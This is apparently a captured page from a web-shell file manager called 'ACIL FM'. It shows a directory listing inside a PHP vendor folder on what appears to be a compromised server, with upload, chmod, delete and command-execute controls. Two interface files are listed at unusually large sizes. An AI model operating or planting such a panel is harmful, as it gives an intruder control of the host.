ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/timbrature/NH-HR-test/vendor/psr/http-factory/src
/
home
mhhtmff
timbrature
NH-HR-test
vendor
psr
http-factory
src
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
RequestFactoryInterface.php
517 B
chmod
View
DL
Edit
Rename
Delete
ResponseFactoryInterface.php
564 B
chmod
View
DL
Edit
Rename
Delete
ServerRequestFactoryInterface.php
951 B
chmod
View
DL
Edit
Rename
Delete
StreamFactoryInterface.php
1.43 MB
chmod
View
DL
Edit
Rename
Delete
UploadedFileFactoryInterface.php
1.13 MB
chmod
View
DL
Edit
Rename
Delete
UriFactoryInterface.php
342 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/timbrature/NH-HR-test/vendor/psr/http-factory/src/ServerRequestFactoryInterface.php
<?php namespace Psr\Http\Message; interface ServerRequestFactoryInterface { /** * Create a new server request. * * Note that server-params are taken precisely as given - no parsing/processing * of the given values is performed, and, in particular, no attempt is made to * determine the HTTP method or URI, which must be provided explicitly. * * @param string $method The HTTP method associated with the request. * @param UriInterface|string $uri The URI associated with the request. If * the value is a string, the factory MUST create a UriInterface * instance based on it. * @param array $serverParams Array of SAPI parameters with which to seed * the generated request instance. * * @return ServerRequestInterface */ public function createServerRequest(string $method, $uri, array $serverParams = []): ServerRequestInterface; }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply